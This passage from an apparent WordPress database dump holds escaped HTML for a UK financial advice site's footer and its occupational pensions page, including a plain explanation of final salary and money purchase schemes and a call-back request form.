src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\" /></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>\r\n<p>&#13;\r\n		</div>\r\n</div>\r\n<p>&#13;\r\n		</div>\r\n<p>&#13;\r\n	</div>\r\n<p>&#13;\r\n				</p>\r\n<footer class=\"footer-area\">\r\n<div class=\"avada-row\"><p>&#13;\r\n			</p>\r\n<section class=\"columns columns-4\">\r\n<article class=\"col\">\r\n<div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">\r\n<p>Our Latest Posts</p>\r\n<ul>\r\n<li>&#13;\r\n				<a href=\"../new-individual-savings-accounts/\">The New Individual Savings Accounts</a>&#13;\r\n						</li>\r\n<p>&#13;\r\n					</p>\r\n<li>&#13;\r\n				<a href=\"../get-auto-enrolment/\">How To Get The Most From Auto-Enrolment</a>&#13;\r\n						</li>\r\n<p>&#13;\r\n					</p>\r\n<li>&#13;\r\n				<a href=\"../may-2014-stock-market-bulletin/\">May 2017 Stock Market Bulletin</a>&#13;\r\n						</li>\r\n<p>&#13;\r\n					</p>\r\n<li>&#13;\r\n				<a href=\"../bank-left-stranded-without-financial-adviser/\">Has Your Bank Left You Stranded Without a Financial Adviser</a>&#13;\r\n						</li>\r\n<p>&#13;\r\n				</ul>\r\n<div style=\"clear:both;\"/></div>\r\n</article>\r\n<article class=\"col\">\r\n<div id=\"text-13\" class=\"footer-widget-col widget_text\">\r\n<p>Equity SMART</p>\r\n<div class=\"textwidget\">\r\n<p>Established for over 20 years we work with individuals, families and owner managed businesses countrywide, helping them organise; plan; protect and achieve the future they choose, through \"hands on\" objective and realistic financial advice they can depend on.</p>\r\n<p>&#13;\r\n</div>\r\n<p>&#13;\r\n		</p>\r\n<div style=\"clear:both;\"/></div>\r\n</article>\r\n<article class=\"col\">\r\n<div id=\"text-22\" class=\"footer-widget-col widget_text\">\r\n<p>Download FREE Guides</p>\r\n<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/1435eb973f72a2%3A125d9572eb46dc/5753952654065664/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../w3QPpbD3DJXcyqPrBaexcUOnTpQKlOX0XuzNYejlD3Hwl1wrM5qbyjoyp4eUJt-wEdlJsAojFjru39Y0ZjrDnA_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-689.js\"/></div>\r\n<p>&#13;\r\n		</p>\r\n<div style=\"clear:both;\"/></div>\r\n</article>\r\n<article class=\"col last\">\r\n<div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\">\r\n<p>Contact Info</p>\r\n<div class=\"contact-info-container\"><p>&#13;\r\n				</p>\r\n<p class=\"address\">Manchester &amp; London</p>\r\n<p>&#13;\r\n		&#13;\r\n				</p>\r\n<p class=\"phone\">Phone: </p>\r\n<p>&#13;\r\n		&#13;\r\n		&#13;\r\n		&#13;\r\n				</p>\r\n<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>\r\n<p>&#13;\r\n		&#13;\r\n				&#13;\r\n				</div>\r\n<p>&#13;\r\n		</p>\r\n<div style=\"clear:both;\"/></div>\r\n<div id=\"social_links-widget-3\" class=\"footer-widget-col social_links\">\r\n<p>Connect With Us</p>\r\n<ul class=\"social-networks clearfix\">\r\n<li class=\"rss\">&#13;\r\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"\">RSS</a>&#13;\r\n<br />\r\n<div class=\"popup\"><p>&#13;\r\n					</p>\r\n<div class=\"holder\"><p>&#13;\r\n						</p>\r\n<p>RSS</p>\r\n<p>&#13;\r\n					</div>\r\n<p>&#13;\r\n				</div>\r\n<p>&#13;\r\n			</li>\r\n<p>&#13;\r\n												</p>\r\n<li class=\"twitter\">&#13;\r\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"\">Twitter</a>&#13;\r\n<br />\r\n<div class=\"popup\"><p>&#13;\r\n					</p>\r\n<div class=\"holder\"><p>&#13;\r\n						</p>\r\n<p>Twitter</p>\r\n<p>&#13;\r\n					</div>\r\n<p>&#13;\r\n				</div>\r\n<p>&#13;\r\n			</li>\r\n<p>&#13;\r\n																																																								</ul>\r\n<div style=\"clear:both;\"/></div>\r\n</article>\r\n</section>\r\n</div>\r\n<p>&#13;\r\n	</footer>\r\n<footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"}; /* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"}; /* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script src=\"../wp-content/themes/Avada/js/main.js\" type=\"text/javascript\">// <![CDATA[\r\n<script type=\"text/javascript\" src=\"../scripts.hellobar.com/565e6e29d8b6bfca77549154aee8b14f23536824.js\"/></body></p>\r\n// ]]></script></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','The New Individual Savings Accounts','Read about','publish','closed','closed','','the-new-individual-savings-accounts','','','2017-09-21 17:40:06','2017-09-21 17:40:06','',0,'http://www.equalitywalk.org.uk/the-new-individual-savings-accounts',0,'post','',0),(85,1,'2017-09-21 16:34:35','2017-09-21 16:34:35','<body class=\"page page-id-125 page-child parent-pageid-25 page-template page-template-side-navigation-php light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"nav\" class=\"menu\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214\"><a href=\"/wealth-management\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"/wealth-platform\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-page-ancestor current-menu-ancestor current-menu-parent current-page-parent current_page_parent current_page_ancestor menu-item-has-children menu-item-27\"><a href=\"/pensions\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"/pensions/pension-release\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"/pensions/pension-transfer\">Pension Transfer</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-136\"><a href=\"/pensions/auto-enrolment-pensions\">Auto Enrolment Pensions</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"/auto-enrolment-report\">Auto Enrolment Report</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"/pension-review\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"/pensions/sipps\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"/pensions/stakeholder-pensions\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-125 current_page_item menu-item-127\"><a href=\"/pensions/occupational-pensions\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"/pensions/group-pension-plan\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"/pensions/income-drawdown\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"/tracking-down-your-lost-pension\">Lost Pension</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47\"><a href=\"/investments\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"isas\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"lump-sum-investment\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"offshore-bonds\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"unit-trusts-oeics\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46\"><a href=\"/trusts\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"/asset-protection-trust\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"/discretionary-trusts\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"/absolute-trusts\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"/gift-loan-schemes\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"/wills-and-trust\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381\"><a href=\"/insurance-protection\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"/critical-illness-insurance-2-0\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"/serious-illness-cover\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"/relevant-life-plan\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"/life-insurance\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"/business-protection-insurance\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n		</ul></nav></div>&#13;\n	</header></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									</div>&#13;\n					<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Occupational Pensions										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"/pensions\" title=\"Pensions\">Pensions</a></li><li>Occupational Pensions</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n													<div id=\"main\" class=\"\" style=\"overflow:hidden !important;\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n					<div id=\"content\" style=\"float:right;\">&#13;\n				<div id=\"post-125\" class=\"post-125 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Occupational Pensions</span>&#13;\n			<span class=\"updated\" style=\"display: none;\">June 19th, 2017</span>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"/author/rs-r-admin\" title=\"Posts by Equity SMART\" rel=\"author\">Investor London</a></span></span>&#13;\n						<div class=\"post-content\">&#13;\n				<p><a href=\"/\"/>Occupational pension schemes are set up by employers to provide pensions and sometimes life assurance benefits for employees, for example, a tax-free lump sum payable if they die before retirement to their dependant(s).</p>&#13;\n<p>There are two main types of occupational pension scheme:</p>&#13;\n<ul><li>Final salary, in which the pension is a proportion of your salary at or near retirement date and is linked to the number of years you have worked for the particular employer; or</li>&#13;\n<li>Money purchase, in which the pension is based on the total value on retirement of the money paid into the scheme and on how the investment has performed.</li>&#13;\n</ul><p>As an employee you have the right to leave, or decline to join, an occupational pension scheme. If you are thinking about leaving an occupational pension scheme, you should consider the implications of this very carefully, because an occupational pension scheme will usually be far more advantageous than a <a title=\"Personal Pensions\" href=\"/2012/pensions/personal-pensions\" data-bitly-type=\"bitly_hover_card\">personal pension</a> scheme.</p>&#13;\n<p>In addition, an occupational pension scheme may be reluctant to allow you to return to the scheme after you have left to take out a personal pension. If you decide to leave, or decline to join, an occupational pension scheme, you will then have to contribute towards additional pension or a personal pension.</p>&#13;\n<p>If you are thinking about leaving a personal pension scheme, you should get independent financial advice first.</p>&#13;\n<p>The occupational pension scheme may be contracted out of additional pension, which means you will not pay contributions into additional pension and will only be entitled to a basic state retirement pension plus an occupational pension on retirement.</p>&#13;\n<p>If the scheme is not contracted out of additional pension you will continue to pay into additional pension and will be eligible for the basic retirement pension plus additional pension plus an occupational pension on retirement.</p>&#13;\n<p> </p>&#13;\n<h2><span style=\"font-size: x-large;\">Request A Call Back</span></h2>&#13;\n<p>To get advice and questions answered from a Investor London advisor please fill out the form below:</p>&#13;\n<div class=\"one_half\"><div id=\"iphorm-outer-52fe115f4b17d\" class=\"iphorm-outer iphorm-outer-16 iphorm-uniform-theme-default iphorm-theme-light-rounded\">&#13;\n    <script type=\"text/javascript\"><![CDATA[\r\n	<!--\r\n		    jQuery(document).ready(function($) {\r\n			\r\n        	$(\'#iphorm-52fe115f4b17d\').iPhorm({\"id\":16,\"uniqueId\":\"52fe115f4b17d\",\"PHPSESSID\":\"a59b240cb7a557e858f0ab9f250bbfd0\",\"useAjax\":true,\"successMessageTimeout\":10,\"clElementIds\":[],\"clDependentElementIds\":[],\"centerFancybox\":true,\"centerFancyboxSpeed\":true});\r\n\r\n	        	        if ($.isFunction($.fn.qtip)) {\r\n	            $(\'.iphorm-tooltip-hover\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow qtip-rounded\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-click\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow qtip-rounded\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                show: {\r\n	                    event: \'focus\'\r\n	                },\r\n	                hide: {\r\n	                    event: \'unfocus\'\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-icon-hover\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow qtip-rounded\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                content: {\r\n	                    text: function (api) {\r\n	                        return $(this).find(\'.iphorm-tooltip-icon-content\')();\r\n	                    }\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-icon-click\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow qtip-rounded\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                show: {\r\n	                    event: \'click\'\r\n	                },\r\n	                hide: {\r\n	                    event: \'unfocus\'\r\n	                },\r\n	                content: {\r\n	                    text: function (api) {\r\n	                        return $(this).find(\'.iphorm-tooltip-icon-content\')();\r\n	                    }\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-labels-inside > .iphorm-element-spacer > label\').hover(function () {\r\n	                $(this).siblings(\'.iphorm-input-wrap\').find(\'.iphorm-tooltip-hover\').qtip(\'show\');\r\n	            }, function () {\r\n	            	$(this).siblings(\'.iphorm-input-wrap\').find(\'.iphorm-tooltip-hover\').qtip(\'hide\');\r\n	            });\r\n	        }\r\n	        \r\n	        	        if ($.isFunction($.fn.uniform)) {\r\n	            $(\'select, input:checkbox, input:radio\', iPhorm.instance.$form).uniform({context: iPhorm.instance.$form, selectAutoWidth: false});\r\n	        }\r\n	        \r\n	        if ($.isFunction($.fn.inFieldLabels)) {\r\n	            $(\'.iphorm-labels-inside:not(.iphorm-element-wrap-recaptcha) > .iphorm-element-spacer > label\', iPhorm.instance.$form).inFieldLabels();\r\n	        }\r\n\r\n	        \r\n	        $(\'.iphorm-group-row > div:last-child:not(:first-child)\', iPhorm.instance.$form).add(\'.iphorm-group-row:last-child\', iPhorm.instance.$form).addClass(\'last-child\');\r\n\r\n	        	    }); // end document.ready()\r\n	//-->\r\n	]]></script><form id=\"iphorm-52fe115f4b17d\" class=\"iphorm iphorm-form-16\" action=\"../../pensions/occupational-pensions/\" method=\"post\" enctype=\"multipart/form-data\">&#13;\n        <div class=\"iphorm-inner iphorm-inner-16\" style=\"background-color: rgb(222, 240, 218);padding-top: 25px;padding-bottom: 25px;padding-right: 20px;padding-left: 20px;\">&#13;\n            <input type=\"hidden\" name=\"iphorm_id\" value=\"16\"/><input type=\"hidden\" name=\"iphorm_uid\" value=\"52fe115f4b17d\"/><input type=\"hidden\" name=\"form_url\" value=\"http://www.equalitywalk.org.uk/pensions/occupational-pensions/\"/><input type=\"hidden\" name=\"referring_url\" value=\"\"/><input type=\"hidden\" name=\"post_id\" value=\"125\"/><input type=\"hidden\" name=\"post_title\" value=\"Occupational Pensions\"/><div class=\"iphorm-success-message iphorm-hidden\"/>&#13;\n            	                        <div class=\"iphorm-elements iphorm-elements-16 iphorm-clearfix\">&#13;\n                <div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_16_1-element-wrap iphorm-clearfix iphorm-labels-inside iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_16_1-element-spacer\">&#13;\n                    <label for=\"iphorm_16_1_52fe115f4b17d\" style=\"color: rgb(0, 0, 0);font: 15px antic slab;\">&#13;\n                Name                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_16_1-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_16_1\" id=\"iphorm_16_1_52fe115f4b17d\" type=\"text\" name=\"iphorm_16_1\" value=\"\" style=\"background-color: rgb(255, 255, 255);color: rgb(0, 0, 0);font: 15px antic slab;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_16_3-element-wrap iphorm-clearfix iphorm-labels-inside iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_16_3-element-spacer\">&#13;\n                    <label for=\"iphorm_16_3_52fe115f4b17d\" style=\"color: rgb(0, 0, 0);font: 15px antic slab;\">&#13;\n                Email address                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_16_3-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_16_3\" id=\"iphorm_16_3_52fe115f4b17d\" type=\"text\" name=\"iphorm_16_3\" value=\"\" style=\"background-color: rgb(255, 255, 255);color: rgb(0, 0, 0);font: 15px antic slab;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_16_4-element-wrap iphorm-clearfix iphorm-labels-inside iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_16_4-element-spacer\">&#13;\n                    <label for=\"iphorm_16_4_52fe115f4b17d\" style=\"color: rgb(0, 0, 0);font: 15px antic slab;\">&#13;\n                Telephone                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_16_4-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_16_4\" id=\"iphorm_16_4_52fe115f4b17d\" type=\"text\" name=\"iphorm_16_4\" value=\"\" style=\"background-color: rgb(255, 255, 255);color: rgb(0, 0, 0);font: 15px antic slab;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div><div class=\"iphorm-element-wrap iphorm-element-wrap-select iphorm_16_7-element-wrap iphorm-clearfix iphorm-labels-inside iphorm-element-optional\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-select iphorm_16_7-element-spacer\">&#13;\n                    <label for=\"iphorm_16_7_52fe115f4b17d\" style=\"color: rgb(0, 0, 0);font: 15px antic slab;\">&#13;\n                What Would You Like To Discuss                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-select iphorm_16_7-input-wrap\">&#13;\n            <select class=\"iphorm-element-select  iphorm_16_7\" name=\"iphorm_16_7\" id=\"iphorm_16_7_52fe115f4b17d\"><option value=\"Pensions\">Pensions</option><option value=\"Insurance\">Insurance</option><option value=\"Trusts\">Trusts</option><option value=\"Wealth Management\">Wealth Management</option><option value=\"Other\">Other</option></select></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n</div><div class=\"iphorm-element-wrap iphorm-element-wrap-select iphorm_16_6-element-wrap iphorm-clearfix iphorm-labels-inside iphorm-element-optional\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-select iphorm_16_6-element-spacer\">&#13;\n                    <label for=\"iphorm_16_6_52fe115f4b17d\" style=\"color: rgb(0, 0, 0);font: 15px antic slab;\">&#13;\n                Best Time To Call                                             </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-select iphorm_16_6-input-wrap\">&#13;\n            <select class=\"iphorm-element-select  iphorm_16_6\" name=\"iphorm_16_6\" id=\"iphorm_16_6_52fe115f4b17d\"><option value=\"Morning\">Morning</option><option value=\"Afternoon\">Afternoon</option><option value=\"Evening\">Evening</option></select></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n</div><div class=\"iphorm-element-wrap iphorm-element-wrap-textarea iphorm_16_10-element-wrap iphorm-clearfix iphorm-labels-inside iphorm-element-optional\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-textarea iphorm_16_10-element-spacer\">&#13;\n                    <label for=\"iphorm_16_10_52fe115f4b17d\" style=\"color: rgb(0, 0, 0);font: 15px antic slab;\">&#13;\n                Your Message                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-textarea iphorm_16_10-input-wrap\">&#13;\n            <textarea class=\"iphorm-element-textarea  iphorm_16_10\" id=\"iphorm_16_10_52fe115f4b17d\" name=\"iphorm_16_10\" style=\"background-color: rgb(255, 255, 255);color: rgb(235, 235, 235);\" rows=\"5\" cols=\"25\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div><div class=\"iphorm-hidden\">&#13;\n    <label>This field should be left blank<input type=\"text\" name=\"iphorm_16_0\"/></label>&#13;\n</div>                <div class=\"iphorm-submit-wrap iphorm-submit-wrap-16 iphorm-clearfix\">&#13;\n                	<div class=\"iphorm-submit-input-wrap iphorm-submit-input-wrap-16\">&#13;\n                        <button class=\"iphorm-submit-element\" type=\"submit\" name=\"iphorm_submit\" style=\"font-size: 18px;\"><span style=\"padding-top: 15px;padding-bottom: 15px;padding-right: 10px;padding-left: 27px;\"><em>Request Call Back</em></span></button>&#13;\n                    </div>&#13;\n                    <div class=\"iphorm-loading-wrap\"><span class=\"iphorm-loading\">Please wait...</span></div>&#13;\n                </div>&#13;\n            </div>&#13;\n                                            </div>&#13;\n            &#13;\n    <script type=\"text/javascript\"><![CDATA[\r\n	<!--\r\n	jQuery(\'#iphorm-outer-52fe115f4b17d script\').remove();\r\n	//-->\r\n	]]></script></form></div></div><div class=\"one_half last\">&#13;\n<div class=\"title\"><p>What We Do</p><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n<style type=\"text/css\"><![CDATA[\r\n	